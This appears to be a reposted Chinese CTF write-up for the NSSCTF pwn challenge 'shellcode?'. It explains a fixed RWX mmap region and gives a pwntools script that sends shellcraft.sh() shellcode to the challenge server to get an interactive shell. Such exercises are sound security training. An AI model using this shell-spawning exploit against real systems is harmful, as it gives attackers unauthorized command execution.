当前位置: 首页 > article >正文

NSSCTF Pwn [SWPUCTF 2022 新生赛]shellcode?题解

article 2025/2/5 16:20:47

下载 exeinfo checksec

开启了NX PIE 64位

查看main函数:

发现有个mmap函数 查一下:

在固定地址 0x30303000 处创建 4KB 的匿名内存映射,具有可读、写、执行权限

所以将shellcode直接写到上面就能执行

exp:

from pwn import *
context (os='linux', arch='amd64', log_level='debug')
#这行一定要加

p = remote("node5.anna.nssctf.cn", 25971)

shellcode = asm(shellcraft.sh())

p.send(shellcode)
p.interactive()

运行 得到flag:


http://www.kler.cn/a/532642.html

相关文章:

  • string例题
  • 读书笔记--分布式架构的异步化和缓存技术原理及应用场景
  • 四、GPIO中断实现按键功能
  • 对象的实例化、内存布局与访问定位
  • 亚博microros小车-原生ubuntu支持系列:20 ROS Robot APP建图
  • FFmpeg源码:av_base64_decode函数分析
  • 网安学习xss和php反序列后的心得
  • minikube 的 Kubernetes 入门教程--Dify
  • [C++]C++中的常见异常和自定义异常
  • 半导体器件与物理篇6 MESFET
  • 解释 Java 中的垃圾回收机制,以及如何优化垃圾回收性能?
  • directx12 3d开发过程中出现的报错 一
  • Python 与 PostgreSQL 集成:深入 psycopg2 的应用与实践
  • 排序算法--计数排序
  • 【NLP 20、Encoding编码 和 Embedding嵌入】
  • 文字加持:让 OpenCV 轻松在图像中插上文字
  • 逻辑运算短路现象记录
  • PostCss
  • 关于deepseek的一些普遍误读
  • Vant框架:助力移动端开发的利器
  • SpringBoot 连接Elasticsearch带账号密码认证 ES连接 加密连接
  • 7.2.背包DP
  • 获取 ARM Cortex - M 系列处理器中 PRIMASK 寄存器的值
  • Azure DevOps Server:集成奇安信开源卫士(OpenSourceSafe)
  • 16 旋转操作模块(rotation.rs)
  • napalm_ce 报错 No module named ‘netmiko.ssh_exception‘ 解决方案(随手记)